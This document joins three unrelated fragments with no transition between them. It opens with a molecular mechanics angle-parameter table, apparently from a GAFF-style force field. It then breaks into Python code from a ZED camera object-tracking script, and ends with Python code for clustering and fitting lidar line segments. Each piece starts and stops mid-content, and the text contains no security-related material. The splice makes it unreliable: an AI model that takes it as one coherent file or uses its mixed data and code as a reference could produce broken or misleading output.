5/2017 6 1.5549 cv-cy-cy 73.5 86.72 5/2017 24 1.1522 cv-cy-hc 46.3 114.40 5/2017 18 1.4851 cx-cy-cy 66.1 106.75 5/2017 3 4.9550 cx-cy-hc 45.7 118.30 SOURCE2 3 5.7799 cy-cy-cy 71.9 88.44 5/2017 714 1.4899 cy-cy-f 84.6 115.66 5/2017 27 3.1666 cy-cy-h1 45.6 113.17 5/2017 481 1.1549 cy-cy-h2 44.9 116.79 5/2017 123 0.8369 cy-cy-hc 45.2 114.76 5/2017 1518 2.4131 cy-cy-n3 80.9 116.60 5/2017 41 1.9946 cy-cy-n 80.3 119.87 5/2017 113 1.4402 cy-cy-na 80.1 119.48 5/2017 17 0.5542 cy-cy-oh 82.6 114.60 5/2017 24 2.6382 cy-cy-os 82.3 114.71 5/2017 39 2.3152 cy-cy-s6 60.8 117.08 5/2017 12 1.3239 cy-cy-ss 60.6 118.27 5/2017 90 1.2954 h1-cy-h1 38.7 109.44 5/2017 67 0.5923 h1-cy-n3 61.4 110.16 5/2017 15 1.4228 h1-cy-n 62.9 107.99 5/2017 80 0.6278 h1-cy-oh 63.3 109.11 5/2017 4 2.0154 h1-cy-os 62.9 109.23 5/2017 10 1.1356 h1-cy-s6 41.7 111.19 5/2017 11 1.1767 h2-cy-n 59.8 114.50 SOURCE4_SOURCE5 213 0.6904 h2-cy-os 63.0 108.84 5/2017 12 0.4716 h2-cy-s6 41.8 110.84 5/2017 23 1.9357 h2-cy-ss 42.0 109.66 5/2017 87 0.4949 hc-cy-hc 38.8 108.97 5/2017 285 0.5322 n -cy-os 109.9 110.91 5/2017 3 2.6953 n -cy-s6 82.4 103.18 SOURCE4_SOURCE5 18 0.8204 n -cy-ss 81.7 105.13 SOURCE4_SOURCE5 165 0.4214 nh-cz-nh 112.6 120.14 SOURCE4_SOURCE5 67 0.3910 br-n1-c1 52.1 180.00 HF/6-31G* 1 c1-n1-c1 65.9 179.92 HF/6-31G* 1 c1-n1-c2 61.7 177.73 HF/6-31G* 1 c1-n1-c3 57.8 177.72 HF/6-31G*_SOURCE5 6 0.4473 c1-n1-ca 60.5 179.99 HF/6-31G* 1 c1-n1-cl 62.2 179.95 HF/6-31G* 1 c1-n1-f 73.9 179.96 HF/6-31G* 1 c1-n1-hn 45.5 179.98 HF/6-31G* 1 c1-n1-i 49.1 179.95 HF/6-31G* 1 c1-n1-n1 83.2 180.00 HF/6-31G* 1 c1-n1-n2 81.6 171.56 HF/6-31G* 1 c1-n1-n3 76.1 175.59 HF/6-31G* 1 c1-n1-n4 74.8 179.69 HF/6-31G* 1 c1-n1-na 75.1 180.00 HF/6-31G* 1 c1-n1-nh 76.3 176.35 HF/6-31G* 1 c1-n1-o 77.9 179.95 HF/6-31G* 1 c1-n1-oh 78.3 174.31 HF/6-31G* 1 c1-n1-os 77.4 176.61 HF/6-31G* 1 c1-n1-p2 71.0 172.83 HF/6-31G* 1 c1-n1-p3 71.6 173.51 HF/6-31G* 1 c1-n1-p4 70.7 173.64 HF/6-31G* 1 c1-n1-p5 74.4 177.28 HF/6-31G* 1 c1-n1-s2 61.9 178.11 HF/6-31G* 1 c1-n1-s4 56.7 169.60 HF/6-31G* 1 c1-n1-s 54.8 179.99 HF/6-31G* 1 c1-n1-s6 63.4 175.92 HF/6-31G* 1 c1-n1-sh 57.2 174.25 HF/6-31G* 1 c1-n1-ss 56.9 176.06 HF/6-31G* 1 c2-n1-n1 77.2 180.00 HF/6-31G* 1 c2-n1-o 91.4 116.94 SOURCE3 2 0.0060 c2-n1-s 66.6 118.00 SOURCE3 2 0.0121 c3-n1-n1 72.2 180.00 HF/6-31G* 1 ca-n1-n1 76.1 180.00 HF/6-31G* 1 ce-n1-o 89.2 122.40 CORR 2 ce-n1-s 66.7 117.34 CORR 2 cf-n1-o 89.2 122.40 CORR 2 cf-n1-s 66.7 117.34 CORR 2 cl-n1-n1 78.0 179.94 HF/6-31G* 1 f -n1-n1 92.9 179.93 HF/6-31G* 1 hn-n1-n1 57.7 179.91 HF/6-31G* 1 i -n1-n1 61.3 179.94 HF/6-31G* 1 n1-n1-n1 105.1 179.97 HF/6-31G* 1 n1-n1-n2 102.5 172.85 HF/6-31G*_SOURCE5 38 0.7957 n1-n1-n3 95.8 175.09 HF/6-31G* 1 n1-n1-n4 94.1 179.91 HF/6-31G* 1 n1-n1-na 94.5 179.97 HF/6-31G* 1 n1-n1-nh 96.1 176.00 HF/6-31G* 1 n1-n1-o 98.2 179.94 HF/6-31G* 1 n1-n1-oh 98.8 173.77 HF/6-31G* 1 n1-n1-os 97.6 176.12 HF/6-31G* 1 n1-n1-p2 88.5 174.71 HF/6-31G* 1 n1-n1-p3 89.5 174.27 HF/6-31G* 1 n1-n1-s 68.7 180.00 SOURCE3 1 n1-n1-sh 71.6 175.07 HF/6-31G* 1 n1-n1-ss 71.5 175.61 HF/6-31G* 1 o -n1-p2 107.3 116.05 SOURCE3 1 p2-n1-s 83.7 119.93 SOURCE3 1 br-n2-br 64.5 106.60 SOURCE3 1 br-n2-c2 60.2 112.40 SOURCE3 1 br-n2-n2 76.1 110.42 SOURCE3 1 br-n2-o 74.5 114.47 SOURCE3 1 br-n2-p2 82.7 111.03 SOURCE3 1 br-n2-s 63.5 115.78 SOURCE3 1 c1-n2-c1 77.4 121.10 SOURCE3 1 c1-n2-c3 60.9 151.88 SOURCE3 4 15.8282 c1-n2-cl 68.8 118.80 SOURCE2 1 c1-n2-hn 52.3 126.50 SOURCE2 3 7.6267 c1-n2-n2 97.2 113.40 SOURCE3 1 c1-n2-o 99.3 113.59 SOURCE3 1 c1-n2-p2 88.5 119.57 SOURCE3 1 c1-n2-s 71.9 117.67 SOURCE3 1 c2-n2-c2 73.2 118.18 SOURCE3 1 c2-n2-c3 68.5 115.30 SOURCE3 8 4.2940 c2-n2-ca 72.1 119.94 SOURCE3 1 c2-n2-cl 70.5 112.64 SOURCE3 1 c2-n2-f 90.8 108.14 SOURCE3 1 c2-n2-hn 53.2 110.80 SOURCE3_SOURCE5 419 0.5563 c2-n2-i 54.9 114.74 SOURCE3 2 0.0139 c2-n2-n1 94.7 115.09 HF/6-31G* 1 c2-n2-n2 98.5 103.59 SOURCE3 2 c2-n2-n3 90.0 118.14 SOURCE3 1 c2-n2-n4 78.6 112.22 SOURCE3 3 0.0406 c2-n2-n 88.9 117.93 SOURCE4_SOURCE5 32 1.2067 c2-n2-na 88.7 117.58 SOURCE3 8 1.6671 c2-n2-nh 89.3 117.61 SOURCE3 6 3.2642 c2-n2-no 86.0 118.02 SOURCE3_SOURCE5 8 0.7772 c2-n2-o 94.4 116.94 SOURCE3 1 c2-n2-oh 90.4 111.12 SOURCE4_SOURCE5 59 1.2303 c2-n2-os 90.0 110.96 SOURCE4_SOURCE5 46 1.0478 c2-n2-p2 88.8 116.00 SOURCE3 1 c2-n2-p3 80.9 119.30 SOURCE3 3 2.8489 c2-n2-p4 82.7 118.77 SOURCE3 1 c2-n2-s4 70.1 112.29 SOURCE3 1 c2-n2-s6 70.8 116.24 SOURCE3 1 c2-n2-s 70.7 118.00 SOURCE3 1 c2-n2-sh 64.9 115.48 SOURCE3 1 c2-n2-ss 66.9 118.04 SOURCE3 4 2.2804 c3-n2-c3 66.1 110.70 SOURCE3 1 c3-n2-ca 68.2 115.05 SOURCE4_SOURCE5 12 1.0676 c3-n2-ce 67.4 118.67 CORR_SOURCE5 270 1.8559 c3-n2-cf 67.4 118.67 CORR_SOURCE5 270 1.8559 c3-n2-hn 45.9 118.40 SOURCE3 1 c3-n2-n1 86.6 116.10 SOURCE4_SOURCE5 33 0.4557 c3-n2-n2 87.8 110.84 SOURCE3_SOURCE5 20 1.2862 c3-n2-nh 86.1 109.99 SOURCE3 1 c3-n2-o 88.3 112.40 SOURCE2 1 c3-n2-p2 85.9 114.21 SOURCE3 2 2.2772 c3-n2-s6 68.3 113.84 SOURCE3 1 c3-n2-s 67.8 116.72 SOURCE3 1 ca-n2-ca 73.9 112.20 SOURCE3 1 ca-n2-hn 50.4 120.00 SOURCE3 1 ca-n2-n2 93.3 113.53 SOURCE3 1 ca-n2-o 93.9 116.00 SOURCE2 1 ca-n2-p2 87.6 118.11 SOURCE3 1 ca-n2-s 69.8 120.11 SOURCE3 1 c -n2-c2 68.3 120.97 SOURCE3 1 c -n2-c 64.6 123.80 SOURCE3 1 c -n2-ca 68.0 120.50 SOURCE3 1 cc-n2-cl 69.5 115.79 CORR 2 cc-n2-hn 52.8 111.25 CORR_SOURCE5 44 0.9238 cc-n2-na 91.8 109.24 SOURCE4_SOURCE5 23 1.5921 cc-n2-nh 88.7 118.47 SOURCE4_SOURCE5 13 1.7276 cd-n2-cl 69.5 115.79 CORR 2 cd-n2-hn 52.8 111.25 CORR_SOURCE5 44 0.9238 ce-n2-hn 53.0 111.00 CORR_SOURCE5 129 0.3980 ce-n2-n 88.7 117.98 CORR_SOURCE5 153 0.9604 ce-n2-nh 88.8 118.34 CORR_SOURCE5 99 1.0308 ce-n2-o 96.2 112.16 SOURCE3 1 ce-n2-oh 89.5 112.79 CORR_SOURCE5 124 1.4261 ce-n2-os 89.1 112.79 CORR_SOURCE5 58 1.1282 ce-n2-s 71.2 116.28 SOURCE3 1 cf-n2-hn 52.9 111.05 CORR_SOURCE5 5 0.7460 cf-n2-n 88.7 117.98 CORR_SOURCE5 153 0.9604 cf-n2-nh 88.8 118.34 CORR_SOURCE5 99 1.0308 cf-n2-o 96.2 112.16 SOURCE3 1 cf-n2-oh 89.5 112.79 CORR_SOURCE5 124 1.4261 cf-n2-os 89.1 112.79 CORR_SOURCE5 58 1.1282 cf-n2-s 71.2 116.28 SOURCE3 1 cl-n2-n1 90.0 108.70 SOURCE2 1 cl-n2-n2 89.2 110.47 SOURCE3 1 cl-n2-o 87.9 114.03 SOURCE3 1 cl-n2-p2 93.1 112.98 SOURCE3 1 cl-n2-s 72.6 115.77 SOURCE3 1 cx-n2-n2 115.2 65.27 5/2017 3 0.2783 f -n2-n2 110.9 114.60 SOURCE2 1 f -n2-o 114.5 110.10 SOURCE2 1 f -n2-p2 113.3 107.10 SOURCE3 1 f -n2-s 89.0 110.73 SOURCE3 1 hn-n2-hn 38.3 120.00 SOURCE3 1 hn-n2-n1 67.7 114.10 SOURCE2 1 hn-n2-n2 69.0 105.01 SOURCE3 19 1.5183 hn-n2-ne 67.7 108.56 SOURCE3 29 5.5708 hn-n2-nf 67.7 108.56 SOURCE3 29 hn-n2-o 70.3 107.37 SOURCE3 1 hn-n2-p2 59.8 112.09 SOURCE3 18 4.0663 hn-n2-p4 55.6 111.33 SOURCE3 1 hn-n2-p5 57.5 122.34 SOURCE3 1 hn-n2-pe 62.6 111.41 SOURCE3 20 4.9895 hn-n2-pf 62.6 111.41 SOURCE3 20 hn-n2-s2 47.7 115.80 SOURCE2 1 hn-n2-s4 46.6 111.21 SOURCE3 1 hn-n2-s 49.4 108.17 SOURCE3 1 hn-n2-s6 48.4 111.17 SOURCE3_SOURCE5 7 0.7012 i -n2-n2 69.5 111.79 SOURCE3 1 i -n2-o 67.5 116.82 SOURCE3 1 i -n2-p2 77.6 113.26 SOURCE3 1 i -n2-s 59.6 116.85 SOURCE3 1 n1-n2-n1 122.8 112.00 HF/6-31G* 1 n2-n2-n1 95.4 180.00 dac_for_azides 0 n2-n2-n2 120.7 109.49 SOURCE3 2 n2-n2-n3 118.0 108.88 SOURCE3 1 n2-n2-n4 101.2 106.45 SOURCE3 1 n2-n2-na 114.3 112.23 SOURCE3 1 n2-n2-nh 115.3 111.70 SOURCE3 5 0.3475 n2-n2-no 114.1 105.97 SOURCE3 1 n2-n2-o 122.4 110.43 SOURCE3 1 n2-n2-oh 113.5 111.51 SOURCE3 1 n2-n2-os 114.6 108.38 SOURCE3 1 n2-n2-p2 114.9 109.15 SOURCE3 1 n2-n2-p3 104.2 113.05 SOURCE3 1 n2-n2-p4 103.8 118.77 SOURCE3 1 n2-n2-p5 114.5 110.46 SOURCE3 1 n2-n2-s4 90.1 107.30 SOURCE3 1 n2-n2-s6 90.9 111.25 SOURCE3 1 n2-n2-s 89.6 115.91 SOURCE3 1 n2-n2-sh 83.0 111.10 SOURCE3 1 n2-n2-ss 86.1 112.14 SOURCE3 1 n3-n2-n3 112.2 115.07 SOURCE3 1 n3-n2-o 117.2 114.00 SOURCE2 1 n3-n2-p2 110.5 115.34 SOURCE3 1 n3-n2-s 87.9 117.13 SOURCE3 1 n4-n2-n4 92.2 106.70 SOURCE3 1 n4-n2-o 99.1 112.20 SOURCE3 1 n4-n2-p2 101.4 113.07 SOURCE3 1 n4-n2-s 78.5 118.50 SOURCE3 1 na-n2-na 113.1 107.00 SOURCE3
box if print_color == blue_sum: # determing the colour, the highest value is equal to and returning that value in a string object_color = "Blue" elif print_color == green_sum: object_color = "Green" elif print_color == red_sum: object_color = "Red" elif print_color == yellow_sum: object_color = "Yellow" elif print_color == white_sum: object_color = "White" elif print_color == black_sum: object_color = "Black" return object_color # returning the highest mask value as the colour def get_detected_objects(detected_objects, label, x, y, z, camera_pose, py_translation, cropped_image, existing_labels, positional_buffer_array, rotational_buffer_array): ''' Detected Objects are stored in an array, with verification for uniqueness of the detection being performed by location data (it being atleast half a meter in any direction -x, y, z) and image similarity which are stored in the directory 'memory_images' with the unique id of the object being stored as the title of the image. The images are compared using the functions 'get_ssim' & 'similarity'. ''' tx, ty, tz, rx, ry, rz, stable = positional_buffer_CAMERAframe(camera_pose, py_translation, positional_buffer_array, rotational_buffer_array) # transaltional, rotational data received from the buffer function # tx, ty, tz, rx, ry, rz = get_positional_data(camera_pose,py_translation) tx = round(tx, 3) ty = round(ty, 3) tz = round(tz, 3) x = round(x, 3) y = round(y, 3) z = round(z, 3) duplicate_detections = [] # an array to store the detection data when the class of object already exists in the list of detected objects exist_values_array = [] # an array that stores the values of duplicate objects from the class to compare it's existence from previous detected data '''From the buffer function, the translational and rotational values are stored in between 2 positions of the camera. Assisted by the stability of the Camera frame of reference, the values in between 2 zero values are stored in an array and their sum is sent through in tx,ty,tz values as a one-off value which is succeeded and preceded with null values. The rotational values are passed in real-time with no buffer however, only affect the positional data when a 90 degree or 180 degree rotational drift occurs, the new translational data, now is altered based on a new method of adding or subtracting from previous values based on a new addition/subtraction method from functions as seen in positional_update(left,right,inverted)''' if rx != 0.0 or ry != 0.0 or rz != 0.0: # update only when the rotation value is greater than zero rotation, detected_objects = rotational_update(detected_objects, rx, ry, rz) if tx != 0.0 or ty != 0.0 or tz != 0.0: # update only when translational value is greater than zero for detected_rot in detected_objects: #updating values based on if "no rotation" in detected_rot: detected_objects = positional_update(detected_objects, tx, ty, tz) elif "rotated left" in detected_rot: detected_objects = positional_update_left(detected_objects, tx, ty, tz) elif "rotated right" in detected_rot: detected_objects = positional_update_right(detected_objects, tx, ty, tz) elif "inverted" in detected_rot: detected_objects = positional_update_inverted(detected_objects, tx, ty, tz) if len(detected_objects) >= 0: # if length of detected objects is greater than or equal to 0 for detected in detected_objects: # scrolling through all the entries of the detected objects list if detected[1] not in existing_labels: existing_labels.append(detected[ 1]) # storing the unique labels of the detected objects in the existing_labels array (useful # for populating first occurences of the onject class in the detcted objects array) if label not in existing_labels: # the entries into detected object is appended, with first instances of # the class is immediately added into the detected_objects list # print(existing_labels) id = random.randint(1, 1000000000) detected_o = [id, label, round(tx + x, 3), round(ty + y, 3), round(tz + z, 3), "orig", "no rotation"] detected_objects.append(detected_o) cv2.imwrite("/home/adi/Downloads/zed-yolo/libdarknet/images/{}.jpg".format(id), cropped_image) # the cropped image (bounding box) of the detected object is written into a file # (to be used for image comparison and human verification that it is a different object) else: # if the class already exists, then this method verifies if the object has been # detected for the first time and if it has, it is appended into detected_objects. for detected in detected_objects: # scrolling through the index of detected_objects from memory if detected[1] == label: # the labels match cv2.imwrite("present_image.jpg", cropped_image) subtracted_value = [round(abs(abs(x) - abs(detected[2])), 3), round(abs(abs(y) - abs(detected[3])), 3), round(abs(abs(z) - abs(detected[4])), 3), detected[0]] exist_values_array.append( subtracted_value) # adding subtracted location values of all occurences of detection in the object class into an array exist_values_array = sorted(exist_values_array) # sorting the array in ascending order new_value = exist_values_array[ 0] # taking the least value of subtraction between new occurence and past occurence present_image = cv2.imread("present_image.jpg") if new_value[0] > 0.2 and new_value[ 2] > 0.2 and image_compare_hist(present_image, new_value[3], label) is False: # if the object is unique it is appended into the list by giving it a unique ID print("True") id = random.randint(1, 1000000000) detected_o = [id, label, round((x - tx), 3), round((y - ty), 3), round((z - tz), 3), "new", "no rotation"] detected_objects.append(detected_o) cv2.imwrite("/home/adi/Downloads/zed-yolo/libdarknet/images/{}.jpg".format(id), cropped_image) # the cropped image (bounding box) of the detected object is written into a file if new_value[0] > 0.1 and new_value[ 2] > 0.1 and image_compare_hist(present_image, new_value[3], label) is True: # if the object is is similar to some object from the past but the location has changed, # the entry in the detected objects array is changed with new location information # print("location of ", label, "changed") for detected in detected_objects: if detected[0] == new_value[3]: id = detected[0] #id is preserved and all the other sections of the entry are replaced with new location of the object detected_objects.remove(detected) detected_o = [id, label, round((x - tx), 3), round((y - ty), 3), round((z - tz), 3), "new location", "no rotation"] detected_objects.append(detected_o) cv2.imwrite("/home/adi/Downloads/zed-yolo/libdarknet/images/{}.jpg".format(id), cropped_image) # the cropped image (bounding box) of the detected object is written into a file return detected_objects def positional_data(camera_pose, py_translation): ''' The positional tracking and rotational data generated by the IMU, gyroscope sensors in the camera are returned here as tx, ty, tz. The positional tracking information relies on a variety of factors such as depth data (Ultra and Quality modes give more reliable information but affect fps, however, Performance mode is faster but the positional information isn't reliable.) The positional tracking information is critical to updating the positional information of detected objects as it moves out of the frame. The rotational information can be used in pose estimation. ''' rotation = camera_pose.get_rotation_vector() # The rotation information from the gyroscopic sensors rx = round(rotation[0], 2) # The rotational information of the x-axis ry = round(rotation[1], 2) # The rotational information of the y-axis rz = round(rotation[2], 2) # The rotational information of the z-axis translation = camera_pose.get_translation(py_translation) # The translational information from the IMU sensors tx = round(translation.get()[0], 3) # The translational information of the x-axis ty = round(translation.get()[1], 3) # The translational information of the y-axis tz = round(translation.get()[2], 3) # The translational information of the z-axis return tx, ty, tz, rx, ry, rz def positional_buffer_CAMERAframe(camera_pose, py_translation, positional_buffer_array, rotational_buffer_array): tx, ty, tz, rx, ry, rz = positional_data(camera_pose, py_translation) '''The translational and rotational data given by the camera may have some errors due to the speed of the movement or via other means (repeated values before the camera frame values normalise to 0,0,0). This function stores values between 2 consecutive zero values and releases them once after the CAMERA frame stablises. This allows, the values to be updated only once, rather than a repeated update.''' stable = True x_sum = y_sum = z_sum = 0.0 rx_sum = ry_sum = rz_sum = 0.0 if tx != 0.0 or ty != 0.0 or tz != 0.0: # A trigger to start storing values for translation to be processed later pos = [tx, ty, tz] if pos not in positional_buffer_array: # storing unique values in an array positional_buffer_array.append(pos) if rx != 0.0 or ry != 0.0
import cv2 import time import math import statistics import numpy as np import matplotlib.pyplot as plt import itertools import random from Lidar_tools import find_lidar_phi_from_coord, find_lidar_theta_from_coord, find_lidar_theta_phi_from_image, \ find_sample_from_angle, interpolation, polar_to_cartesian from Lidar_tools_AG import coords_ro_move, build_roatation_matrix_3D def build_matrix_from_line(target_line, option=0): try: angle = math.atan((target_line[1] - target_line[3]) / (target_line[0] - target_line[2])) except ZeroDivisionError: angle = np.pi / 2 theta = np.pi / 2 - angle if option == 0: # move to the position of the first point move_matrix = np.array([-target_line[2], -target_line[3]]) else: # move to the center of the line move_matrix = np.array([-(target_line[2] + target_line[0])/2, -(target_line[3] + target_line[1])/2]) rotation_martix = np.array([[math.cos(theta), -math.sin(theta)], [math.sin(theta), math.cos(theta)]]) return move_matrix, rotation_martix, angle def debug_c1(n,n_last, lines): # for inherit, threshold must be the same with cluster_criterion lines_col1 = lines[n_last, 0:2] lines_col1 = np.expand_dims(lines_col1, axis=0) lines_col2 = lines[n_last, 2:4] lines_col2 = np.expand_dims(lines_col2, axis=0) line = lines[n] result = cluster_criterion(line, lines_col1, lines_col2) if result == 0: callback = '-- can\'t connect in the other dirction, correctly inherit the cluster' else: callback = '-- can connect in the other dirction, something wrong' return callback #def rotation_to_line(n, lines_col1, lines_col2): # rotate to the n line # try: # theta = math.atan((lines_col2[n, 1] - lines_col1[n, 1]) / (lines_col2[n, 0] - lines_col1[n, 0])) # except ZeroDivisionError: # theta = np.pi / 2 # theta = np.pi / 2 - theta # # move_matrix = np.array([-(lines_col1[n,0] + lines_col2[n,0])/2, -(lines_col1[n,1] + lines_col2[n,1])/2]) # roatation_martix = np.array([[math.cos(theta), -math.sin(theta)], # [math.sin(theta), math.cos(theta)]]) # # lines_col1_new = np.dot((lines_col1 + move_matrix), np.linalg.inv(roatation_martix)) # lines_col2_new = np.dot((lines_col2 + move_matrix), np.linalg.inv(roatation_martix)) # # return lines_col1_new, lines_col2_new def cluster_criterion(n, lines_col1, lines_col2, threshold_angle=20, threshold_offset=1, threshold_dist=7): # output a index vector, where == 1 means that line is connected with the target line threshold_angle = threshold_angle / 180 * np.pi sample_num = lines_col1.shape[0] move_matrix, roatation_martix, angle = build_matrix_from_line([lines_col1[n, 0], lines_col1[n, 1], lines_col2[n, 0], lines_col2[n, 1]], option=1) lines_col1_new = np.dot((lines_col1 + move_matrix), np.linalg.inv(roatation_martix)) lines_col2_new = np.dot((lines_col2 + move_matrix), np.linalg.inv(roatation_martix)) delta = lines_col2_new - lines_col1_new theta_new = np.arctan(delta[:, 1] / delta[:, 0]) angle_diff = np.pi / 2 - abs(theta_new) x_diff = np.min(abs(np.hstack([lines_col1_new[:, 0].reshape(sample_num, 1), lines_col2_new[:, 0].reshape(sample_num, 1)])),axis=1) y_diff = np.min(abs(np.hstack([lines_col1_new[:, 1].reshape(sample_num, 1), lines_col2_new[:, 1].reshape(sample_num, 1)])),axis=1) connect_index_add = (angle_diff < threshold_angle) & (x_diff < threshold_offset) & (y_diff < threshold_dist) return connect_index_add def cluster_criterion2(n, lines_col1, lines_col2, threshold_r=0.01): move_matrix, roatation_martix, angle = build_matrix_from_line([lines_col1[n, 0], lines_col1[n, 1], lines_col2[n, 0], lines_col2[n, 1]], option=1) lines_col1_new = np.dot((lines_col1 + move_matrix), np.linalg.inv(roatation_martix)) lines_col2_new = np.dot((lines_col2 + move_matrix), np.linalg.inv(roatation_martix)) delta = lines_col2_new - lines_col1_new k = delta[:, 1] / delta[:, 0] k = -1/k assert(not (np.any(k == np.inf) | np.any(k==0))) line_center = (lines_col2_new + lines_col1_new) / 2 b = line_center[:,1] - k * line_center[:,0] intercept_x = np.abs(b/k) # it's also the r1 r2 = np.sqrt(intercept_x**2 + b**2) connect_index_add = np.abs(intercept_x - r2) < threshold_r return connect_index_add def cluster_criterion3(n, lines_col1, lines_col2, threshold_angle=5, threshold_offset=0.5): threshold_angle = 180 - 2*threshold_angle threshold_angle = threshold_angle / 180 * np.pi sample_num = lines_col1.shape[0] move_matrix, roatation_martix, angle = build_matrix_from_line( [lines_col1[n, 0], lines_col1[n, 1], lines_col2[n, 0], lines_col2[n, 1]], option=1) lines_col1_new = np.dot((lines_col1 + move_matrix), np.linalg.inv(roatation_martix)) lines_col2_new = np.dot((lines_col2 + move_matrix), np.linalg.inv(roatation_martix)) delta = lines_col2_new - lines_col1_new k = delta[:, 1] / delta[:, 0] k2 = -1/k line_center = (lines_col2_new + lines_col1_new) / 2 m = line_center[:,1] - k * line_center[:,0] m2 = line_center[:,1] - k2 * line_center[:,0] inter1 = np.vstack([np.zeros_like(m), m]).T inter2 = np.vstack([np.zeros_like(m2), m2]).T vector1 = inter1 - line_center length1 = np.sqrt(vector1[:,0]**2 + vector1[:,1]**2) base_vector1 = vector1[n,:] base_length1 = np.sqrt(vector1[n,0]**2 + vector1[n,1]**2) vector2 = inter2 - line_center length2 = np.sqrt(vector2[:, 0] ** 2 + vector2[:, 1] ** 2) base_vector2 = vector2[n, :] base_length2 = np.sqrt(vector2[n, 0] ** 2 + vector2[n, 1] ** 2) x_diff = np.min(abs(np.hstack([lines_col1_new[:, 0].reshape(sample_num, 1), lines_col2_new[:, 0].reshape(sample_num, 1)])),axis=1) angle1 = np.arccos(np.dot(vector1, base_vector1) / length1 / base_length1) angle2 = np.arccos(np.dot(vector2, base_vector2) / length2 / base_length2) connect_index_add1 = angle1 - angle2 > threshold_angle connect_index_add1[np.where(k == math.inf)] = 1 connect_index_add1[np.where(k == -math.inf)] = 1 connect_index_add2 = x_diff < threshold_offset connect_index_add2[np.where(k != math.inf)] = 1 connect_index_add2[np.where(k != -math.inf)] = 1 connect_index_add = connect_index_add1 & connect_index_add2 #print(connect_index_add) return connect_index_add def iter_core(n_current, n_last, lines, check_state, connect_index_initial, cluster_index, inherit_C): lines_col1 = lines[:, 0:2] lines_col2 = lines[:, 2:4] #sample_num = lines.shape[0] #line = lines[n_current] if check_state[n_current] == 0: # this line is not checked before check_state[n_current] = 1 connect_index_add = cluster_criterion(n_current, lines_col1, lines_col2) connect_index_current = connect_index_initial | connect_index_add order = 'continue' n_next = 0 for x in connect_index_add: if x == 1: # recursive order_last, C, check_state_deeper, connect_index_deeper = iter_core(n_next, n_current, lines, check_state, connect_index_current, cluster_index, inherit_C) connect_index_current = connect_index_deeper | connect_index_current check_state = check_state_deeper | check_state if order_last == 'inherit C and continue': inherit_C = C order = 'inherit C and continue' n_next += 1 return order, inherit_C, check_state, connect_index_current elif check_state[n_current] == 1: # this line is checked before, but not assigned with a cluster number # actually do nothing here C = None # not used order = 'continue' return order, C, check_state, connect_index_initial elif check_state[n_current] == 2: # this line is checked before, and assigned with a cluster number # this part is useful if the criterion let line A connected to B, but cant let line B connect to A #print('inherit from old cluster!') #print(debug_c1(n_current, n_last, lines)) C = cluster_index[n_current] # note: if the current process connects with more than 1 old cluster, # only the last C (cluster num) will be inherited, all previous C will be overwrite. # But connections from all old clusters will be added from the line below. connect_index_initial[np.where(cluster_index == C)] = 1 # connection from old cluster is added order = 'inherit C and continue' return order, C, check_state, connect_index_initial def connect_lines(lines): lines_col1 = lines[:, 0:2] lines_col2 = lines[:, 2:4] sample_num = lines.shape[0] cluster_index = np.zeros(sample_num, dtype=int) check_state = np.zeros(sample_num, dtype=int) n_current = 0 for line in lines: connect_index_initial = np.zeros(sample_num, dtype=bool) connect_index_initial[n_current] = 1 inherit_C = 0 # the first few lines are same as in iter_core if check_state[n_current] == 0: check_state[n_current] = 1 connect_index_add = cluster_criterion(n_current, lines_col1, lines_col2) connect_index_current = connect_index_initial | connect_index_add order = 'set new cluster' n_next = 0 for x in connect_index_add: if x == 1: order_last, C, check_state_deeper, connect_index_deeper = iter_core(n_next,n_current, lines, check_state, connect_index_current, cluster_index, inherit_C) connect_index_current = connect_index_deeper | connect_index_current check_state = check_state_deeper | check_state if order_last == 'inherit C and continue': inherit_C = C order = 'add to previous cluster' n_next += 1 #### DEBUG if np.any(cluster_index[np.where(connect_index_current == 1)] > 0): print('warning: cluster override!!!!!!!!!!!!!!!!!!!!!!!!!!!!!') overrided_cluster = cluster_index[np.where(connect_index_current == 1)] if order == 'add to previous cluster': if np.any(overrided_cluster == inherit_C): print('-- cluster expand') if np.any((overrided_cluster != inherit_C) & (overrided_cluster != 0)): print('-- cluster rewrite') else: print('-- override but no inherit detected!') ## if order == 'add to previous cluster': cluster_index[np.where(connect_index_current == 1)] = inherit_C check_state[np.where(connect_index_current == 1)] = 2 else: # means: not connect to previous cluster C = np.max(cluster_index) + 1 # set to a new cluster cluster_index[np.where(connect_index_current == 1)] = C check_state[np.where(connect_index_current == 1)] = 2 #### DEBUG if np.any(check_state ==1): assert(0) ## #### DEBUG else: if check_state[n_current] == 1: assert(cluster_index[n_current] != 0) elif check_state[n_current] == 2: assert (cluster_index[n_current] != 0) ## n_current += 1 #### DEBUG assert (not np.any(cluster_index == 0)) ## normalized_cluster_index = np.zeros_like(cluster_index) maximum = np.max(cluster_index) num = 1 for x in range(maximum+1): if np.any(cluster_index == x): normalized_cluster_index[np.where(cluster_index == x)] = num num += 1 #print(cluster_index) #print('normalized_cluster_index: ',normalized_cluster_index) return normalized_cluster_index def cluster_split_fit(points, points_new, threshold, max_loop=20): # fit the cluster with 2 lines rms_error_last = math.inf best_by_now_l, best_by_now_r = None, None best_by_now_l_length, best_by_now_r_length = None, None for x in range(max_loop): if x == max_loop - 1: if best_by_now_l is not None and best_by_now_r is not None: print('split done, but not optimized!!!!!!!!!!!!!!!!!!!!!!!!!') return best_by_now_l, best_by_now_l_length, best_by_now_r, best_by_now_r_length, 'split done' else: print('cant split cluster!!!!!!!!!!!!!!!!!!!!!!!!!!') return [0,0,0,0], [0,0], [0,0,0,0], [0,0], 'cant split' group_left = points[np.where(points_new[:,0] < 0), :] group_right = points[np.where(points_new[:,0] > 0), :] group_left, group_right = group_left[0], group_right[0] [vx_l, vy_l, x0_l, y0_l] = cv2.fitLine(group_left, distType=cv2.cv2.DIST_L2, param=0, reps=0.01, aeps=0.01) [vx_r, vy_r, x0_r, y0_r] = cv2.fitLine(group_right, distType=cv2.cv2.DIST_L2, param=0, reps=0.01, aeps=0.01) x0_l, y0_l, x0_r, y0_r = x0_l[0], y0_l[0], x0_r[0], y0_r[0] try: theta_l
